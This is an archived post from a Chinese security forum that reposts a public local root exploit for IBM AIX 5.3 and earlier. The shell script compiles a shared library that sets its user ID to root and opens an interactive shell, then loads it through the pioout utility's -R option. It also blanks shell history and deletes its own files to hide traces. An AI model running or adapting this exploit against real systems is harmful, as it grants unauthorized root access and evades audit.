piolib.c 邪恶八进制信息安全团队技术讨论组 国内为数不多的技术与管理并举的专业信息安全团队 - Discuz! Archiver" /> IBM AIX <= 5.3 sp6 pioout Arbitrary Library Loading Local Root Exploit(页 1) - 安全测试代码{ Exploits and Shellcode } - 邪恶八进制信息安全团队技术讨论组 努力为祖国的信息安全撑起一片蓝天 - Archiver

邪恶八进制信息安全团队技术讨论组's Archiver

ring04h 2007-8-12 12:51

IBM AIX <= 5.3 sp6 pioout Arbitrary Library Loading Local Root Exploit

[code]#!/bin/sh
#
# 07/2007: public release
#
echo "-------------------------------"
echo " AIX pioout Local Root Exploit "
echo " By qaaz"
echo "-------------------------------"
cat >piolib.c <<_EOF_
#include <stdlib.h>
#include <unistd.h>
void init() __attribute__ ((constructor));
void init()
{
    seteuid(0);
    setuid(0);
    putenv("HISTFILE=/dev/null");
    execl("/bin/bash", "bash", "-i", (void *) 0);
    execl("/bin/sh", "sh", "-i", (void *) 0);
    perror("execl");
    exit(1);
}
_EOF_
gcc piolib.c -o piolib -shared -fPIC
[ -r piolib ] && /usr/lpd/pio/etc/pioout -R ./piolib
rm -f piolib.c piolib

# milw0rm.com [2007-07-27]
[/code]

页: [1]
© 1999-2008 EvilOctal Security Team